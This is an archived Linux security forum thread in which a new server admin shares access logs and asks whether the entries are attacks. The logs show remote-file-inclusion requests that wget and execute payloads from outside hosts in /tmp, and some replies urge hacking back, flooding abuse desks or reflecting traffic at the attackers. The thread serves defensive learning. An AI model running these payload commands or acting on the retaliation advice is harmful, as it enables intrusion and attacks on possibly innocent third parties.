Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here. |
Notices |
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
Are you new to LinuxQuestions.org? Visit the following links:
Site Howto |
Site FAQ |
Sitemap |
Register Now
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Get a virtual cloud desktop with the Linux distro that you want in less than five minutes with Shells! With over 10 pre-installed distros to choose from, the worry-free installation life is here! Whether you are a digital nomad or just looking for flexibility, Shells can put your Linux machine on the device that you want to use.
Exclusive for LQ members, get up to 45% off per month. Click here for more info.
|
|
|
06-10-2006, 11:17 PM
|
#1
|
Senior Member
Registered: Feb 2006
Location: Seattle, WA: USA
Distribution: Slackware 11.0
Posts: 1,191
Rep:
|
How do I go about reporting an attempt to compromise my host?
OK, so I am about 6 months into Linux and I decide it was time to put up a webserver. Just out of curiosity, I review my access_log today and find some pretty interesting stuff. I am by no means an expert on all of this, but it appears that someone (multiple people actually) among other things, attempted to use injection to navigate to my /tmp directory to exploit it's world-writable permissions to download and execute a script.
Code:
217.141.108.138 - - [04/Jun/2006:00:25:03 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%201q2w3.xhost.ro/m3du;chmod%20744%20m3du;./m3du%20217.127.64.53%208080;00;echo%20YYY;echo| HTTP/1.1" 404 287
217.141.108.138 - - [04/Jun/2006:00:25:05 -0500] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%201q2w3.xhost.ro/m3du;chmod%20744%20m3du;./m3du%20217.127.64.53%208080;00;echo%20YYY;echo| HTTP/1.1" 404 286
217.141.108.138 - - [04/Jun/2006:00:25:06 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%201q2w3.xhost.ro/m3du;chmod%20744%20m3du;./m3du%20217.127.64.53%208080;00;echo%20YYY;echo| HTTP/1.1" 404 293
217.141.108.138 - - [04/Jun/2006:00:25:08 -0500] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%201q2w3.xhost.ro/m3du;chmod%20744%20m3du;./m3du%20217.127.64.53%208080;00;echo%20YYY;echo| HTTP/1.1" 404 291
217.141.108.138 - - [04/Jun/2006:00:25:10 -0500] "POST /xmlrpc.php HTTP/1.1" 404 287
217.141.108.138 - - [04/Jun/2006:00:25:12 -0500] "POST /drupal/xmlrpc.php HTTP/1.1" 404 294
217.141.108.138 - - [04/Jun/2006:00:25:13 -0500] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 300
217.141.108.138 - - [04/Jun/2006:00:25:15 -0500] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 297
....
65.110.43.170 - - [07/Jun/2006:01:10:35 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 287
65.110.43.170 - - [07/Jun/2006:01:10:36 -0500] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 286
65.110.43.170 - - [07/Jun/2006:01:10:37 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 293
65.110.43.170 - - [07/Jun/2006:01:10:38 -0500] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 291
65.110.43.170 - - [07/Jun/2006:01:10:39 -0500] "GET /articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 302
65.110.43.170 - - [07/Jun/2006:01:10:40 -0500] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 297
65.110.43.170 - - [07/Jun/2006:01:10:42 -0500] "POST /xmlrpc.php HTTP/1.1" 404 287
65.110.43.170 - - [07/Jun/2006:01:10:44 -0500] "POST /blog/xmlrpc.php HTTP/1.1" 404 292
65.110.43.170 - - [07/Jun/2006:01:10:45 -0500] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 299
65.110.43.170 - - [07/Jun/2006:01:10:46 -0500] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 300
65.110.43.170 - - [07/Jun/2006:01:10:47 -0500] "POST /drupal/xmlrpc.php HTTP/1.1" 404 294
65.110.43.170 - - [07/Jun/2006:01:10:48 -0500] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 300
65.110.43.170 - - [07/Jun/2006:01:10:49 -0500] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 297
65.110.43.170 - - [07/Jun/2006:01:10:50 -0500] "POST /xmlrpc.php HTTP/1.1" 404 287
65.110.43.170 - - [07/Jun/2006:01:10:52 -0500] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 294
65.110.43.170 - - [07/Jun/2006:01:10:53 -0500] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 294
66.249.72.171 - - [07/Jun/2006:05:00:06 -0500] "GET /robots.txt HTTP/1.1" 404 287
IRC ports?
Code:
69.16.172.3 - - [01/Jun/2006:07:00:40 -0500] "CONNECT 69.16.172.2:6667 HTTP/1.0" 405 302
69.16.172.3 - - [01/Jun/2006:07:00:40 -0500] "POST http://69.16.172.2:6667/ HTTP/1.0" 405 299
I have no Idea what this is, but doesn't look to malicious.
Code:
213.203.248.196 - - [31/May/2006:17:42:17 -0500] "GET /a1b2c3d4e5f6g7h8i9/nonexistentfile.php HTTP/1.0" 404 303
213.203.248.196 - - [31/May/2006:17:42:17 -0500] "GET /adxmlrpc.php HTTP/1.0" 404 277
213.203.248.196 - - [31/May/2006:17:42:18 -0500] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 286
213.203.248.196 - - [31/May/2006:17:42:18 -0500] "GET /phpAdsNew/adxmlrpc.php HTTP/1.0" 404 287
213.203.248.196 - - [31/May/2006:17:42:18 -0500] "GET /phpadsnew/adxmlrpc.php HTTP/1.0" 404 287
213.203.248.196 - - [31/May/2006:17:42:19 -0500] "GET /phpads/adxmlrpc.php HTTP/1.0" 404 284
213.203.248.196 - - [31/May/2006:17:42:19 -0500] "GET /Ads/adxmlrpc.php HTTP/1.0" 404 281
213.203.248.196 - - [31/May/2006:17:42:20 -0500] "GET /ads/adxmlrpc.php HTTP/1.0" 404 281
213.203.248.196 - - [31/May/2006:17:42:20 -0500] "GET /xmlrpc.php HTTP/1.0" 404 275
213.203.248.196 - - [31/May/2006:17:42:21 -0500] "GET /xmlrpc/xmlrpc.php HTTP/1.0" 404 282
213.203.248.196 - - [31/May/2006:17:42:21 -0500] "GET /xmlsrv/xmlrpc.php HTTP/1.0" 404 282
Are these hack attempts? Is there a way to tell if they were successful or not? I'm assuming all the 404's are a good thing, but then again, I am pretty new to this stuff. If these are hack attempts, I find it pretty amazing that so many people would be interested in my pidly little webserver with nothing important on it. Did I sleep with the wrong persons daughter or something?
If any one could help me make sense of these logs, and give some advice on what I need to do from here, I would greatly apprecieate it.
thanks for your time!
...drkstr
**edit**
oops, I forgot to ask my primary question.
Assuming this is an attempt to compromise my system. What kind of tools can I use to A) figure out who is doing it, and B) prevent them from doing it in the future.
thanks again!
**edit**
Last edited by drkstr; 06-11-2006 at 01:46 AM.
|
|
|
06-11-2006, 10:36 AM
|
#2
|
Moderator
Registered: May 2001
Posts: 29,415
|
Just out of curiosity, I review my access_log today
Ahhh... better review logs regularly. Achieve max mana by hardening the box first, regular updating and backups and using auditing tools like a file integrity checker (Aide, Samhain, md5deep or even tripwire), your distro's package manager (if it has verification functionality), Tiger, Chkrootkit, Rootkit Hunter and reporting tools like Logwatch, swatch etc, etc.
it appears that someone (multiple people actually) among other things, attempted
Yes, it's always heartwarming to see that out of the gazillion boxen around they take interest in *yours*, innit? ;-p
Are these hack attempts?
H^HCracking attempts, yes.
Is there a way to tell if they were successful or not? I'm assuming all the 404's are a good thing
In general you would be looking for vulnerabilities in the webserver (or more likely applications running on top of it: PHP-based apps are notorious for being flawed), rogue processes that run with the UID of the webserver, binaries and scripts in accessable temp dirs (lsof), processes with "typical" string contents like wget (see mod_security), processes using files that are deleted (lsof), and to some lesser extent setuid root binaries in accessable temp dirs, rootkits. Yes, four-oh-fours are good.
Assuming this is an attempt to compromise my system. What kind of tools can I use to A) figure out who is doing it, and B) prevent them from doing it in the future.
Tools and methods mentioned above. Prevention means taking away chances. This is best done starting with a box in pristine state. Check out the LQ FAQ: Security references, post #1 under securing and hardening. Best to read, draw a plan and discuss it.
|
|
|
06-11-2006, 12:40 PM
|
#3
|
Senior Member
Registered: Feb 2006
Location: Seattle, WA: USA
Distribution: Slackware 11.0
Posts: 1,191
Original Poster
Rep:
|
Wow, the "LQ FAQ: Security references" looks like a great resource! Thanks for takeing the time to compile all of that information. I see I have some reading to do, so I will post back if I can't figure something out.
Quote:
Ahhh... better review logs regularly.
|
Yes I can see now that this could be an important step.
THanks again for the information!
...drkstr
|
|
|
06-12-2006, 09:43 PM
|
#4
|
Member
Registered: Mar 2006
Distribution: debian sarge
Posts: 222
Rep:
|
retaliate. hack the hackers. or ping the hell out of them. if its done right, their systems will totally crash.
operator
|
|
|
06-12-2006, 09:46 PM
|
#5
|
Member
Registered: Mar 2006
Distribution: debian sarge
Posts: 222
Rep:
|
retaliate. hack the hackers. or ping the hell out of them. if its done right, their systems will totally crash.
operator
|
|
|
06-12-2006, 10:29 PM
|
#6
|
Senior Member
Registered: Dec 2005
Location: Brisbane, Australia
Distribution: Slackware64 14.0
Posts: 4,141
Rep:
|
Quote:
Originally Posted by operator10001
retaliate. hack the hackers. or ping the hell out of them. if its done right, their systems will totally crash.
operator
|
And if they're just unwittingly hosting someobody else's bot, you've left yourself open to accusations of cracking for no good reason. Some of the ISPs here put no scanning, cracking, spamming type clauses in their usage policy so you could wind up cut off from the internet - that would definitely hurt me
|
|
|
06-12-2006, 11:47 PM
|
#7
|
Member
Registered: Mar 2006
Distribution: debian sarge
Posts: 222
Rep:
|
oh ok. why didnt i think of that? those rules are very seldom enforced. the net is an anarchy.
|
|
|
06-13-2006, 01:14 AM
|
#8
|
Member
Registered: Mar 2006
Distribution: BackTrack, RHEL, FC, CentOS, IPCop, Ubuntu, 64Studio, Elive, Dream Linux, Trix Box
Posts: 310
Rep:
|
Best way,
Create an automated response for abuse@XXXX
which is to be picked from log files automatically.
(Enforce them to look into the matter by sending those many mails as that of log entries )
|
|
|
06-13-2006, 01:19 AM
|
#9
|
Senior Member
Registered: Feb 2006
Location: Seattle, WA: USA
Distribution: Slackware 11.0
Posts: 1,191
Original Poster
Rep:
|
Thanks for the advice but I would rather spend my time figuring out how to secure my own box instead of figuring out how to crack some lamo script kiddie's box. Not that I am against your idea, in fact I think it would be sweet sweet justice, I just think I would benefit more from spending the time to learn good security techniques. Maybe when I am more knowledgable in this topic I can figure out away to set up countermeasures to route their own commands back to them. I would find it pretty historical if I got a script kiddie to try and hack his own box without realizing it.
regards,
...drkstr
|
|
|
06-13-2006, 01:34 AM
|
#10
|
Member
Registered: Nov 2005
Location: Land of Linux :: Finland
Distribution: Pop!_OS && Windows 10 && Arch Linux
Posts: 831
|
you could patch your iptables/kernel with mirror target and use it temporarily when you are getting hits to a ssh port
|
|
|
06-13-2006, 01:42 AM
|
#11
|
Member
Registered: Mar 2006
Distribution: BackTrack, RHEL, FC, CentOS, IPCop, Ubuntu, 64Studio, Elive, Dream Linux, Trix Box
Posts: 310
Rep:
|
Hello everyone,
@//////,
It took a lot of time to measure "/"s,
Hey but whats that mirroring /|\ thing?
|
|
|
06-13-2006, 01:45 AM
|
#12
|
Member
Registered: Mar 2006
Distribution: BackTrack, RHEL, FC, CentOS, IPCop, Ubuntu, 64Studio, Elive, Dream Linux, Trix Box
Posts: 310
Rep:
|
Hi guys,
I had heard somewhere that we could imitate to be NT boxes over the Internet, anybody has an idea? Also, I had heard that there are some daemons which pretend to be cracked, crashed and collapsed and then notify us about everything that the cracker did. I had found some but had oldest possible versions that are of no use now (kernel 2.0.xx)
|
|
|
06-13-2006, 03:00 AM
|
#13
|
Member
Registered: Nov 2005
Location: Land of Linux :: Finland
Distribution: Pop!_OS && Windows 10 && Arch Linux
Posts: 831
|
That mirror target switches source and destination fields in packets and resends them, so if someone tries to bruteforce port 22 and you use mirror target he will be cracking himself.
|
|
|
06-13-2006, 03:04 AM
|
#14
|
Senior Member
Registered: Feb 2006
Location: Seattle, WA: USA
Distribution: Slackware 11.0
Posts: 1,191
Original Poster
Rep:
|
Quote:
Create an automated response for abuse@XXXX
which is to be picked from log files automatically.
|
Good idea.
I was hoping to try and set something up that would automatically detect intrusion attempts and log the IP in a &^#@* list. As a counter measure, I could then hopefully configure my iptables to check this list prior to any rule checking and route all traffic back to them if it finds a match in the list.
Does anyone know if it is possible to do this with iptables?
thanks for the help!
...drkstr
|
|
|
06-13-2006, 03:32 AM
|
#15
|
Member
Registered: Mar 2006
Distribution: BackTrack, RHEL, FC, CentOS, IPCop, Ubuntu, 64Studio, Elive, Dream Linux, Trix Box
Posts: 310
Rep:
|
Hello darkstar,
We obviously can do it with simplest of scripts.
I haven't created it yet but we can grep as follows:-
To check root user ssh fail
Quote:
grep "Failed password for root" /var/log/messages | gawk -F: '{print $4}' | gawk -F" " '{print $6}' | sort | uniq -c
|
To check illegal usernames such as "test"
Quote:
grep "Failed password for illegal" /var/log/messages | gawk -F: '{print $4}' | gawk -F" " '{print $8}' | sort | uniq -c
|
To check for ssh scan:-
Quote:
grep "Did not receive identification string from" /var/log/messages | gawk '{print $12}' | sort | uniq -c
|
the file may change /var/log/messages or /var/log/secure
other things remain the same.
And we get a good list (Superb candidates) redirect this to a list and then
iptables -I INPUT -s xx.x.x.x -j DROP
Risk involved is that what if you enter wrong passwords?
So better make it count the no. of tries.
|
|
|
All times are GMT -5. The time now is 12:36 PM.
|
LinuxQuestions.org is looking for people interested in writing
Editorials, Articles, Reviews, and more. If you'd like to contribute
content, let us know.
|
Latest Threads
LQ News
|
|